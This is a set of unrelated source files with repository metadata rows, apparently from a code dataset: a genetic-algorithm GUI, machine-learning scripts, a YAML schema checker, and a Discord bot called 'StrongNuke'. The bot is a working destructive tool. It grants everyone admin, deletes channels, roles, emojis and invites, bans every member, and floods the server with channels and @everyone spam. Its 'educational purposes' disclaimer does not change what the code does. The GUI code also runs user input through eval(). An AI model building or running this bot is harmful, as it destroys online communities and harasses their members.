return [list(map(int, dict[val].split(","))) for val in dict if dict[val] != ""]
def graph(self, y1, y2):
"""plots"""
self.fig.clear()
self.axes = self.fig.add_subplot(111)
self.axes.plot(y1, "g", label="average fitness")
self.axes.plot(y2, "r", label="max fitness")
self.axes.set_ylabel("fitness")
self.axes.set_xlabel("generations")
self.axes.yaxis.set_label_position("right")
# legend options
self.axes.legend(
bbox_to_anchor=(0.5, 1.1),
loc="upper center",
ncol=2,
fancybox=True,
shadow=True,
)
# forces integer spacing between generations
self.axes.xaxis.set_major_locator(MaxNLocator(integer=True))
self.canvas.draw()
def minimize(self):
'''minimize button'''
self.objective_function = f"-1*({self.function_entry.get()})"
self.run()
def maximize(self):
'''maximize button'''
self.objective_function = self.function_entry.get()
self.run()
def dreamcatcher(self):
"""tries to catch exceptions a man can only dream of"""
try:
self.bounds = self.extract_bounds(self.choices)
if not any(k in self.objective_function for k in list(self.choices.keys())):
raise Exception("Καμία μεταβλητή")
for key in self.choices.keys():
if self.choices[key] == "" and key in self.objective_function:
raise Exception(
"Ασυμφωνία μεταβλητών συνάρτησης με μεταβλητές Π.Ο."
)
for key in self.choices.keys():
if self.choices[key] != "" and key not in self.objective_function:
raise Exception(
"Ασυμφωνία μεταβλητών συνάρτησης με μεταβλητές Π.Ο."
)
self.generations = self.generation_slider.get()
ga = GeneticAlgorithm(
self.pop_slider.get(),
self.bits_slider.get(),
self.bounds,
self.pm_slider.get(),
self.pc_slider.get(),
self.cp_slider.get(),
eval("lambda x=0,y=0,z=0:" + self.objective_function),
)
return ga
except Exception as e:
print(e)
return
def run_helper(self,n,ga,output):
for i in range(n):
output[i].configure(text='{:.2f}'.format(ga.best().real_genes[i]))
def clear_outputs(self):
"""καθαριζει τα πεδια εξοδου"""
self.gener_output.configure(text="")
self.x0_output.configure(text="")
self.x1_output.configure(text="")
self.x2_output.configure(text="")
self.best_x0_output.configure(text="")
self.best_x1_output.configure(text="")
self.best_x2_output.configure(text="")
def run(self):
"""run buttom"""
ga = self.dreamcatcher()
if ga:
self.clear_outputs()
ga.run(self.radio_var.get())
b = [ga.best().fitness]
a = [ga.fitness_average]
self.best = b[0]
self.best_index = 1
for i in range(1, self.generations):
self.run_helper(len(self.bounds),ga,self.x_outputs)
self.gener_output.configure(text=i + 1)
self.gener2_output.configure(text=i + 1)
ga.run(self.radio_var.get())
b.append(ga.best().fitness)
self.best_output.configure(text=float("{:.2f}".format(b[i])))
a.append(ga.fitness_average)
self.avg_output.configure(text=float("{:.2f}".format(a[i])))
if self.best < ga.best().fitness:
self.best = ga.best().fitness
self.best_index = i + 1
self.best_sol_output.configure(text=float("{:.2f}".format(self.best)))
self.best_gen_output.configure(text=self.best_index)
self.best_gener2_output.configure(text=self.best_index)
self.run_helper(len(self.bounds), ga, self.bestx_output)
self.graph(a, b)
self.fig.clear()
def main():
root = tk.Tk()
window = MainWindow(root, "#efebe9")
main()
| 35.540201 | 146 | 0.471227 | 2,951 | 28,290 | 4.416808 | 0.141986 | 0.028464 | 0.032914 | 0.035906 | 0.473377 | 0.33451 | 0.247276 | 0.211984 | 0.207074 | 0.195412 | 0 | 0.026906 | 0.386462 | 28,290 | 795 | 147 | 35.584906 | 0.723915 | 0.117922 | 0 | 0.418124 | 0 | 0.009539 | 0.074197 | 0.005963 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025437 | false | 0 | 0.012719 | 0 | 0.047695 | 0.00159 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e64ae25a77784fd4b7b20e3342337ee39e59146 | 1,027 | py | Python | WordEmbedding.py | pratikasarkar/nlp | 275c80ab10f6dc4b4553bbcc5e5c8a4d00ff9fea | [
"Unlicense"
] | null | null | null | WordEmbedding.py | pratikasarkar/nlp | 275c80ab10f6dc4b4553bbcc5e5c8a4d00ff9fea | [
"Unlicense"
] | null | null | null | WordEmbedding.py | pratikasarkar/nlp | 275c80ab10f6dc4b4553bbcc5e5c8a4d00ff9fea | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Wed Feb 10 14:59:45 2021
@author: ASUS
"""
# Word Embedding Techniques using Embedding Layer in Keras
from tensorflow.keras.preprocessing.text import one_hot
sent=[ 'the glass of milk',
'the glass of juice',
'the cup of tea',
'I am a good boy',
'I am a good developer',
'understand the meaning of words',
'your videos are good',
'a king',
'a queen']
# Vocabulary size
voc_size = 10000
# One hot representation
onehot_repr = [one_hot(words,voc_size) for words in sent]
# Word Embedding Representation
from tensorflow.keras.layers import Embedding
from tensorflow.keras.preprocessing.sequence import pad_sequences
from tensorflow.keras.models import Sequential
sent_len = 8
embedded_docs = pad_sequences(onehot_repr,padding = 'pre',maxlen = sent_len)
dim = 10
model = Sequential()
model.add(Embedding(voc_size,dim,input_length=sent_len))
model.compile(optimizer = 'adam', loss = 'mse')
model.summary()
model.predict(embedded_docs)[[7,8]]
| 22.822222 | 76 | 0.720545 | 150 | 1,027 | 4.833333 | 0.553333 | 0.077241 | 0.104828 | 0.088276 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026995 | 0.170399 | 1,027 | 44 | 77 | 23.340909 | 0.823944 | 0.193768 | 0 | 0 | 0 | 0 | 0.194853 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.173913 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e66acc250bc25deceb509ba5cc57131ce35b37b | 6,262 | py | Python | scripts/adage_pancancer.py | Commentator-2/tybalt | cc172d4118ef22d130d7cbfe0159af5e810450f0 | [
"BSD-3-Clause"
] | 141 | 2017-08-16T22:52:48.000Z | 2022-02-01T21:26:51.000Z | scripts/adage_pancancer.py | Commentator-2/tybalt | cc172d4118ef22d130d7cbfe0159af5e810450f0 | [
"BSD-3-Clause"
] | 73 | 2017-08-10T13:18:49.000Z | 2022-01-10T03:07:32.000Z | scripts/adage_pancancer.py | Commentator-2/tybalt | cc172d4118ef22d130d7cbfe0159af5e810450f0 | [
"BSD-3-Clause"
] | 60 | 2017-11-18T13:18:52.000Z | 2022-03-12T20:52:58.000Z | """
Gregory Way 2017
Variational Autoencoder - Pan Cancer
scripts/adage_pancancer.py
Comparing a VAE learned features to ADAGE features. Use this script within
the context of a parameter sweep to compare performance across a grid of
hyper parameters.
Usage:
Run in command line with required command arguments:
python scripts/adage_pancancer.py --learning_rate
--batch_size
--epochs
--sparsity
--noise
--output_filename
--num_components
Typically, arguments to this script are compiled automatically by:
python scripts/vae_paramsweep.py --parameter_file <parameter-filepath>
--config_file <configuration-filepath>
Output:
Loss and validation loss for the specific model trained
"""
import os
import argparse
import numpy as np
import pandas as pd
from keras.engine.topology import Layer
from keras.layers import Input, Dense, Dropout, Activation
from keras.models import Sequential, Model
import keras.backend as K
from keras.regularizers import l1
from keras import optimizers, activations
class TiedWeightsDecoder(Layer):
"""
Transpose the encoder weights to apply decoding of compressed latent space
"""
def __init__(self, output_dim, encoder, activation=None, **kwargs):
self.output_dim = output_dim
self.encoder = encoder
self.activation = activations.get(activation)
super(TiedWeightsDecoder, self).__init__(**kwargs)
def build(self, input_shape):
self.kernel = self.encoder.weights
super(TiedWeightsDecoder, self).build(input_shape)
def call(self, x):
# Encoder weights: [weight_matrix, bias_term]
output = K.dot(x - self.encoder.weights[1],
K.transpose(self.encoder.weights[0]))
if self.activation is not None:
output = self.activation(output)
return output
def compute_output_shape(self, input_shape):
return (input_shape[0], self.output_dim)
parser = argparse.ArgumentParser()
parser.add_argument('-l', '--learning_rate',
help='learning rate of the optimizer')
parser.add_argument('-b', '--batch_size',
help='Number of samples to include in each learning batch')
parser.add_argument('-e', '--epochs',
help='How many times to cycle through the full dataset')
parser.add_argument('-s', '--sparsity',
help='How much L1 regularization penalty to apply')
parser.add_argument('-n', '--noise',
help='How much Gaussian noise to add during training')
parser.add_argument('-f', '--output_filename',
help='The name of the file to store results')
parser.add_argument('-c', '--num_components', default=100,
help='The latent space dimensionality to test')
parser.add_argument('-o', '--optimizer', default='adam',
help='optimizer to use', choices=['adam', 'adadelta'])
parser.add_argument('-w', '--untied_weights', action='store_false',
help='use tied weights in training ADAGE model')
args = parser.parse_args()
# Set hyper parameters
learning_rate = float(args.learning_rate)
batch_size = int(args.batch_size)
epochs = int(args.epochs)
sparsity = float(args.sparsity)
noise = float(args.noise)
output_filename = args.output_filename
latent_dim = int(args.num_components)
use_optimizer = args.optimizer
tied_weights = args.untied_weights
# Random seed
seed = int(np.random.randint(low=0, high=10000, size=1))
np.random.seed(seed)
# Load Data
rnaseq_file = os.path.join('data', 'pancan_scaled_zeroone_rnaseq.tsv.gz')
rnaseq_df = pd.read_table(rnaseq_file, index_col=0)
original_dim = rnaseq_df.shape[1]
# Split 10% test set randomly
test_set_percent = 0.1
rnaseq_test_df = rnaseq_df.sample(frac=test_set_percent)
rnaseq_train_df = rnaseq_df.drop(rnaseq_test_df.index)
if tied_weights:
# Input place holder for RNAseq data with specific input size
encoded_rnaseq = Dense(latent_dim,
input_shape=(original_dim, ),
activity_regularizer=l1(sparsity),
activation='relu')
dropout_layer = Dropout(noise)
tied_decoder = TiedWeightsDecoder(input_shape=(latent_dim, ),
output_dim=original_dim,
activation='sigmoid',
encoder=encoded_rnaseq)
autoencoder = Sequential()
autoencoder.add(encoded_rnaseq)
autoencoder.add(dropout_layer)
autoencoder.add(tied_decoder)
else:
input_rnaseq = Input(shape=(original_dim, ))
encoded_rnaseq = Dropout(noise)(input_rnaseq)
encoded_rnaseq_2 = Dense(latent_dim,
activity_regularizer=l1(sparsity))(encoded_rnaseq)
activation = Activation('relu')(encoded_rnaseq_2)
decoded_rnaseq = Dense(original_dim, activation='sigmoid')(activation)
autoencoder = Model(input_rnaseq, decoded_rnaseq)
if use_optimizer == 'adadelta':
optim = optimizers.Adadelta(lr=learning_rate)
elif use_optimizer == 'adam':
optim = optimizers.Adam(lr=learning_rate)
autoencoder.compile(optimizer=optim, loss='mse')
hist = autoencoder.fit(np.array(rnaseq_train_df), np.array(rnaseq_train_df),
shuffle=True,
epochs=epochs,
batch_size=batch_size,
validation_data=(np.array(rnaseq_test_df),
np.array(rnaseq_test_df)))
# Save training performance
history_df = pd.DataFrame(hist.history)
history_df = history_df.assign(num_components=latent_dim)
history_df = history_df.assign(learning_rate=learning_rate)
history_df = history_df.assign(batch_size=batch_size)
history_df = history_df.assign(epochs=epochs)
history_df = history_df.assign(sparsity=sparsity)
history_df = history_df.assign(noise=noise)
history_df = history_df.assign(seed=seed)
history_df.to_csv(output_filename, sep='\t')
| 37.497006 | 79 | 0.6565 | 749 | 6,262 | 5.291055 | 0.319092 | 0.036336 | 0.038607 | 0.031794 | 0.078224 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00617 | 0.249441 | 6,262 | 166 | 80 | 37.722892 | 0.837021 | 0.203449 | 0 | 0 | 0 | 0 | 0.117967 | 0.007058 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037736 | false | 0 | 0.09434 | 0.009434 | 0.160377 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e66c35eab5b6d8658cea2e23d962d4c0b9705ad | 6,770 | py | Python | python/cm/checker.py | arenadata/adcm | a499caa30adc2a53e7b3f46c96a865f9e4079e4e | [
"Apache-2.0"
] | 16 | 2019-11-28T18:05:21.000Z | 2021-12-08T18:09:18.000Z | python/cm/checker.py | arenadata/adcm | a499caa30adc2a53e7b3f46c96a865f9e4079e4e | [
"Apache-2.0"
] | 1,127 | 2019-11-29T08:57:25.000Z | 2022-03-31T20:21:32.000Z | python/cm/checker.py | arenadata/adcm | a499caa30adc2a53e7b3f46c96a865f9e4079e4e | [
"Apache-2.0"
] | 10 | 2019-11-28T18:05:06.000Z | 2022-01-13T06:16:40.000Z | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import ruyaml
class FormatError(Exception):
def __init__(self, path, message, data=None, rule=None, parent=None, caused_by=None):
self.path = path
self.message = message
self.data = data
self.rule = rule
self.errors = caused_by
self.parent = parent
self.line = None
if isinstance(data, ruyaml.comments.CommentedBase):
self.line = data.lc.line
elif parent and isinstance(parent, ruyaml.comments.CommentedBase):
self.line = parent.lc.line
super().__init__(message)
class SchemaError(Exception):
pass
class DataError(Exception):
pass
def check_type(data, data_type, path, rule=None, parent=None):
if not isinstance(data, data_type):
msg = f'Object should be a {str(data_type)}'
if path:
last = path[-1]
msg = f'{last[0]} "{last[1]}" should be a {str(data_type)}'
raise FormatError(path, msg, data, rule, parent)
def check_match_type(match, data, data_type, path, rule, parent=None):
if not isinstance(data, data_type):
msg = f'Input data for {match}, rule "{rule}" should be {str(data_type)}"'
raise FormatError(path, msg, data, rule, parent)
def match_none(data, rules, rule, path, parent=None):
if data is not None:
msg = 'Object should be empty'
if path:
last = path[-1]
msg = f'{last[0]} "{last[1]}" should be empty'
raise FormatError(path, msg, data, rule, parent)
def match_any(data, rules, rule, path, parent=None):
pass
def match_list(data, rules, rule, path, parent=None):
check_match_type('match_list', data, list, path, rule, parent)
for i, v in enumerate(data):
process_rule(v, rules, rules[rule]['item'], path + [('Value of list index', i)], parent)
return True
def match_dict(data, rules, rule, path, parent=None):
check_match_type('match_dict', data, dict, path, rule, parent)
if 'required_items' in rules[rule]:
for i in rules[rule]['required_items']:
if i not in data:
raise FormatError(path, f'There is no required key "{i}" in map.', data, rule)
for k in data:
new_path = path + [('Value of map key', k)]
if 'items' in rules[rule] and k in rules[rule]['items']:
process_rule(data[k], rules, rules[rule]['items'][k], new_path, data)
elif 'default_item' in rules[rule]:
process_rule(data[k], rules, rules[rule]['default_item'], new_path, data)
else:
msg = f'Map key "{k}" is not allowed here (rule "{rule}")'
raise FormatError(path, msg, data, rule)
def match_dict_key_selection(data, rules, rule, path, parent=None):
check_match_type('dict_key_selection', data, dict, path, rule, parent)
key = rules[rule]['selector']
if key not in data:
msg = f'There is no key "{key}" in map.'
raise FormatError(path, msg, data, rule, parent)
value = data[key]
if value in rules[rule]['variants']:
process_rule(data, rules, rules[rule]['variants'][value], path, parent)
elif 'default_variant' in rule:
process_rule(data, rules, rules[rule]['default_variant'], path, parent)
else:
msg = f'Value "{value}" is not allowed for map key "{key}".'
raise FormatError(path, msg, data, rule, parent)
def match_one_of(data, rules, rule, path, parent=None):
errors = []
sub_errors = []
for obj in rules[rule]['variants']:
try:
process_rule(data, rules, obj, path, parent)
except FormatError as e:
if e.errors:
sub_errors += e.errors
errors.append(e)
if len(errors) == len(rules[rule]['variants']):
errors += sub_errors
msg = f'None of the variants for rule "{rule}" match'
raise FormatError(path, msg, data, rule, parent, caused_by=errors)
def match_set(data, rules, rule, path, parent=None):
if data not in rules[rule]['variants']:
msg = f'Value "{data}" not in set {rules[rule]["variants"]}'
raise FormatError(path, msg, data, rule, parent=parent)
def match_simple_type(obj_type):
def match(data, rules, rule, path, parent=None):
check_type(data, obj_type, path, rule, parent=parent)
return match
MATCH = {
'list': match_list,
'dict': match_dict,
'one_of': match_one_of,
'dict_key_selection': match_dict_key_selection,
'set': match_set,
'string': match_simple_type(str),
'bool': match_simple_type(bool),
'int': match_simple_type(int),
'float': match_simple_type(float),
'none': match_none,
'any': match_any,
}
def check_rule(rules):
if not isinstance(rules, dict):
return (False, 'YSpec should be a map')
if 'root' not in rules:
return (False, 'YSpec should has "root" key')
if 'match' not in rules['root']:
return (False, 'YSpec should has "match" subkey of "root" key')
return (True, '')
def process_rule(data, rules, name, path=None, parent=None):
if path is None:
path = []
if name not in rules:
raise SchemaError(f"There is no rule {name} in schema.")
rule = rules[name]
if 'match' not in rule:
raise SchemaError(f"There is no mandatory match attr in rule {rule} in schema.")
match = rule['match']
if match not in MATCH:
raise SchemaError(f"Unknown match {match} from schema. Impossible to handle that.")
# print(f'process_rule: {MATCH[match].__name__} "{name}" data: {data}')
MATCH[match](data, rules, name, path=path, parent=parent)
def check(data, rules):
if not isinstance(data, ruyaml.comments.CommentedBase):
raise DataError("You should use ruyaml.round_trip_load() to parse data yaml")
if not isinstance(rules, ruyaml.comments.CommentedBase):
raise SchemaError("You should use ruyaml.round_trip_load() to parse schema yaml")
process_rule(data, rules, 'root')
| 35.631579 | 96 | 0.645347 | 961 | 6,770 | 4.445369 | 0.17898 | 0.050562 | 0.042135 | 0.043071 | 0.305712 | 0.245084 | 0.194522 | 0.147004 | 0.131554 | 0.081929 | 0 | 0.001929 | 0.234121 | 6,770 | 189 | 97 | 35.820106 | 0.821987 | 0.121418 | 0 | 0.119403 | 0 | 0 | 0.193189 | 0.012306 | 0 | 0 | 0 | 0 | 0 | 1 | 0.11194 | false | 0.022388 | 0.007463 | 0 | 0.186567 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
5e67367986a944e9128e9626aafdf7669e04ea3c | 13,469 | py | Python | StrongNuke_Official.py | SpinachIsDelicious/StrongNuke-Discord-Server-Nuker | cdc8ff0fee6db6c3b13d99edf24dd914cb052786 | [
"MIT"
] | null | null | null | StrongNuke_Official.py | SpinachIsDelicious/StrongNuke-Discord-Server-Nuker | cdc8ff0fee6db6c3b13d99edf24dd914cb052786 | [
"MIT"
] | null | null | null | StrongNuke_Official.py | SpinachIsDelicious/StrongNuke-Discord-Server-Nuker | cdc8ff0fee6db6c3b13d99edf24dd914cb052786 | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
import random
import subprocess
import asyncio
from discord import Permissions
import os
import threading # run code concurrently
from pyperclip import copy
# we want to use multiprocessing instead of threading since processes are more efficient
import multiprocessing
import pprint
import requests
import json
from colorama import init, Fore as cc
from colorama import Fore
from sys import exit
init()
dr = DR = r = R = cc.LIGHTRED_EX
g = G = cc.LIGHTGREEN_EX
b = B = cc.LIGHTBLUE_EX
m = M = cc.LIGHTMAGENTA_EX
c = C = cc.LIGHTCYAN_EX
y = Y = cc.LIGHTYELLOW_EX
w = W = cc.RESET
print("Loading modules...")
os.system("cls")
def displayStrongNuke():
print(Fore.RED + "Please note that your computer may overheat or use a lot of CPU using StrongNuke, this is mainly because of the speed and requests being sent to actually nuke servers. Enjoy nuking servers!" + Fore.RESET)
print(Fore.BLUE + "Made by Spinach#3369" + Fore.RESET)
print(Fore.CYAN + """
░██████╗████████╗██████╗░░█████╗░███╗░░██╗░██████╗░███╗░░██╗██╗░░░██╗██╗░░██╗███████╗
██╔════╝╚══██╔══╝██╔══██╗██╔══██╗████╗░██║██╔════╝░████╗░██║██║░░░██║██║░██╔╝██╔════╝
╚█████╗░░░░██║░░░██████╔╝██║░░██║██╔██╗██║██║░░██╗░██╔██╗██║██║░░░██║█████═╝░█████╗░░
░╚═══██╗░░░██║░░░██╔══██╗██║░░██║██║╚████║██║░░╚██╗██║╚████║██║░░░██║██╔═██╗░██╔══╝░░
██████╔╝░░░██║░░░██║░░██║╚█████╔╝██║░╚███║╚██████╔╝██║░╚███║╚██████╔╝██║░╚██╗███████╗
╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝░╚════╝░╚═╝░░╚══╝░╚═════╝░╚═╝░░╚══╝░╚═════╝░╚═╝░░╚═╝╚══════╝""")
# I'm going to fix it deleting already nuked roles :D (after the channel problem)
displayStrongNuke()
# using webhooks to display messages feature is highly experimental and so you'll have to go into the code to enable it
# (it gets less pings since it ratelimits IPs faster so if you want 30 pings only, go ahead)
token = input(f"{g}Input bot token: {c}")
prefix = input(f"{m}Input bot prefix: {b}")
webhook_name = ""
tag = ""
user_id = 0
tagBanned = False
identityProtection = True
role_spamn = ["Annihilated!", "Obliterated!",
"Nuked!", "Decimated!"]
role_amount = 100
channels_created = 100
authorized = [user_id, "0", "0"]
SPAM_CHANNEL = ["Nuked!", "Annihilated!",
"Eradicated!", "Decimated!", "Incinerated!"]
SPAM_MESSAGE = ["Dang, you got nuked!",
"Absolutely anihilated!", "Dang man! Nice server!", "You got absolutely decimated!", "It's a beautiful server now mate.", "Beautiful server.", "Imagine messing with the wrong people xD", "How about NUKE", "These are some words I have: Decimated, Annihilated, Eradication, Incinerated, and you just got rekt."] # Spam ping names
client = commands.Bot(command_prefix=prefix)
client.remove_command("help")
print(Fore.RED + f"To nuke: type {prefix}nuke" + Fore.RESET)
presence = "with you!"
print(Fore.RED +
f"Nuking ready: Type {prefix}nuke to start the nuking process." + Fore.RESET)
copy(f"{prefix}nuke")
print(Fore.BLUE + "Copied nuke command to clipboard!" + Fore.RESET)
print(Fore.BLUE + "(!) Please note that if the Discord Server has Community enabled, it won't delete some channels." + Fore.RESET)
@client.event
async def on_ready():
await client.change_presence(activity=discord.Game(name=presence))
@client.command()
async def stop(ctx):
if ctx.author.id == user_id:
await ctx.author.send("Currently stopping the bot!")
await client.close()
print(Fore.GREEN +
f"{client.user.name} has logged out successfully." + Fore.RESET)
else:
await ctx.author.send("Currently stopping the bot!")
print(Fore.RED + "Fake stop message sent to user" + Fore.RESET)
@stop.error
async def stop_error(ctx, error):
if isinstance(error, commands.NotOwner):
await ctx.send("You can't use this command!")
@client.command()
async def rolespam(ctx):
for i in range(role_amount+1):
print(
Fore.RED + f"Started spamming roles!")
await ctx.guild.create_role(name=random.choice(role_spamn))
# roleSpamThread = Thread(target=rolespam)
@rolespam.error
async def rolespam_error(ctx, error):
await ctx.author.send(f"An error occured- {str(error)}")
print(Fore.RED + "Note that sometimes, our PreventDeletion of already nuked channels fails. This is completely normal. At least the server is already nuked!")
@client.command()
async def say(ctx, *, msgsay):
async def do():
await ctx.message.delete()
await ctx.send(msgsay)
t = threading.Thread(target=do).start()
@say.error
async def say_error(ctx, error):
await ctx.author.send(f"An error occured- {str(error)}")
@client.command(aliases=["annihilate","decimate","eradicate","obliterate","destroy"])
async def nuke(ctx):
await ctx.message.delete()
guild = ctx.guild
try:
role = discord.utils.get(guild.roles, name="@everyone")
await role.edit(permissions=Permissions.all())
print(Fore.MAGENTA + "I have given everyone admin." + Fore.RESET)
except:
print(Fore.GREEN + "I was unable to give everyone admin" + Fore.RESET)
try:
for role in ctx.guild.roles:
role = discord.utils.get(guild.roles, name=role)
# why not give everyone admin
await role.edit(permissions=Permissions.all())
except:
pass
for channel in guild.channels:
try:
channelVar = str(channel.name)
if channelVar in SPAM_CHANNEL or channelVar.lower().strip() in SPAM_CHANNEL:
print(Fore.GREEN + "Prevented deletion of already nuked channels!")
#I try in many ways to make the antichanneldeletion work
else:
await channel.delete()
print(Fore.MAGENTA +
f"{channel.name} was deleted." + Fore.RESET)
except Exception as err:
print(Fore.GREEN + f"{channel.name} was NOT deleted." + Fore.RESET)
print(Fore.RED + f"Channel delete error -{str(err)}" + Fore.RESET)
for member in guild.members:
try:
if member in authorized:
print(
Fore.RED + f"{member.name}#{member.discriminator} Was unable to be banned: ADMIN DETECTED" + Fore.RESET)
else:
await member.ban()
print(
Fore.MAGENTA + f"{member.name}#{member.discriminator} Was banned" + Fore.RESET)
except:
print(
Fore.GREEN + f"{member.name}#{member.discriminator} Was unable to be banned." + Fore.RESET)
for role in guild.roles:
try:
await role.delete()
print(Fore.MAGENTA + f"{role.name} Has been deleted" + Fore.RESET)
except:
print(Fore.GREEN +
f"{role.name} Has not been deleted" + Fore.RESET)
# try:
# roleSpamThread = Thread(target=rolespam)
# roleSpamThread.start()
# except:
# print(Fore.RED + "Role spamming has not been enabled." + Fore.RESET)
for emoji in list(ctx.guild.emojis):
try:
await emoji.delete()
print(Fore.MAGENTA + f"{emoji.name} Was deleted" + Fore.RESET)
except:
print(Fore.GREEN + f"{emoji.name} Wasn't Deleted" + Fore.RESET)
banned_users = await guild.bans()
for ban_entry in banned_users:
user = ban_entry.user
try:
await user.unban(user)
print(
Fore.MAGENTA + f"{user.name}#{user.discriminator} Was successfully unbanned." + Fore.RESET)
except:
print(
Fore.GREEN + f"{user.name}#{user.discriminator} Was not unbanned." + Fore.RESET)
for invite in await guild.invites():
if invite.inviter in authorized:
print(Fore.CYAN + "Prevented deletion of Authorized Invite" + Fore.RESET)
else:
print(
Fore.RED + f"Deleted an invite to {guild.name}." + Fore.RESET)
await invite.delete() # no proof!!
async def create():
for i in range(channels_created):
await guild.create_text_channel(str(random.choice(SPAM_CHANNEL)))
print(Fore.GREEN + "Created text channel!" + Fore.RESET)
await guild.create_voice_channel(str(random.choice(SPAM_CHANNEL)))
print(Fore.CYAN + "Created voice channel!" + Fore.RESET)
await create()
for channel in guild.text_channels:
link = await channel.create_invite(max_age=0, max_uses=0)
print(f"New Invite: {link}")
print(f"Obliterated {guild.name} Successfully.")
return
@nuke.error
async def nuke_error(ctx, error):
if isinstance(error, discord.errors.HTTPException):
print(
Fore.RED + "The bot is ratelimited! This shows that the server has reached over 1,000 pings! [CODE: 1]" + Fore.RESET)
@client.command()
async def pingall(ctx):
await ctx.message.delete()
await ctx.channel.send("@everyone", delete_after=0)
@pingall.error
async def pingall_error(ctx, error):
await ctx.author.send(f"Surprisingly. There has been an error with the **PINGALL** command! __{str(error)}__")
@client.command(aliases=['membercount', 'mcount', "scount", 'members', "servercount"])
async def memcount(ctx):
await ctx.channel.send("There are " + str(ctx.message.guild.member_count) + " members in the server!")
@memcount.error
async def memcount_error(ctx, error):
await ctx.author.send(f"Surprisingly. You're messing with the bot! Here's the error you gave. __{str(error)}__")
@client.event
async def on_guild_channel_create(channel):
try:
async def startSpam():
while True:
# create = await channel.create_webhook(name=webhook_name)
if identityProtection == True:
await channel.send("@everyone | " + random.choice(SPAM_MESSAGE))
print(Fore.YELLOW + "Sent @everyone message!" + Fore.RESET)
# await create.send("@everyone | " + random.choice(SPAM_MESSAGE))
# print(Fore.YELLOW + "Sent @everyone message!" + Fore.RESET)
else:
await channel.send("@everyone | " + random.choice(SPAM_MESSAGE) + f" -{tag}")
print(Fore.YELLOW + "Sent @everyone message!" + Fore.RESET)
# await create.send("@everyone | " + random.choice(SPAM_MESSAGE) + f" -{tag}")
# print(Fore.YELLOW + "Sent @everyone message!" + Fore.RESET)
if channel.type in (discord.ChannelType.voice, discord.ChannelType.text):
if channel.type == discord.ChannelType.voice:
pass
else:
await startSpam()
except Exception as err:
if isinstance(err, discord.errors.HTTPException):
print(
Fore.RED + "The bot has been ratelimited! [CODE: 2]" + Fore.RESET)
@client.command()
async def vcspam(ctx):
guild = ctx.guild
print(Fore.CYAN + "Started spamming VCs!" + Fore.RESET)
for i in range(channels_created):
await guild.create_voice_channel(str(random.choice(SPAM_CHANNEL)))
@vcspam.error
async def vcspam_error(ctx, error):
await ctx.author.send(f"Stop messing with the bot bro! __{str(error)}__")
@client.command()
async def help(ctx):
try:
if ctx.author.id in authorized: # make sure to input real alt accounts and tags or else no help command
await ctx.author.send(f"""
{prefix}help - shows this message
{prefix}nuke - nukes the server
{prefix}pingall - pings everyone
{prefix}stop - logs the bot out
{prefix}rolespam - spams roles
{prefix}memcount - shows the amount of members in the server
{prefix}vcspam - spams half channels (highly unrecommended as {prefix}nuke does it as well)""")
else:
# fake help message
await ctx.author.send("Hello there! The **HELP** message is currnetly being developed! Remember: It'll be here soon!")
except:
await ctx.send("Your DMs aren't enabled! Enable them to get the message.")
@help.error
async def help_error(ctx, error):
await ctx.author.send(f"A super rare **HELP** error has occured! __{str(error)}__")
@client.command(pass_context=True, aliases=['dmsend', 'dm'])
async def senddm(ctx, userID, *, text):
user = await client.get_user(userID)
await user.send(text)
# @senddm.error
# async def senddm_error(ctx,error):
# if isinstance(error, )
# Still being developed!
client.run(token, bot=True)
displayStrongNuke()
input(Fore.RED + "The code has successfully ran. After this, the process will terminate itself. Press enter to close. >>> ")
os.system(f"taskkill /f /im {__file__}")
quit()
# Developer's message (idk)
"""
First of all. I created this tool for educational
purposes only. I am not responsible for any actions
you take using this tool.
Second of all.
I don't know what the developer's message is but
you should still understand, that I AM NOT RESPONSIBLE.
Third of all.
Spinach#3369
"""
